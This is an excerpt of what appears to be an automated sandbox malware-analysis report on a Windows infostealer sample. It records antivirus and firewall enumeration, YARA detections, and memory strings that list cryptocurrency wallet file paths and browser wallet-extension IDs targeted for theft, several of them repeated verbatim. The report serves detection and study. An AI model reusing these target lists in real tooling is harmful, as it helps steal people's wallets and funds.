Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_0040996D
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004143C0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 2_2_004143C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 2_2_004144B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC88390 NSS_GetVersion, 2_2_6BC88390
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.2450353895.0000021713EAB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5564, type: MEMORYSTR
Source: Yara match File source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
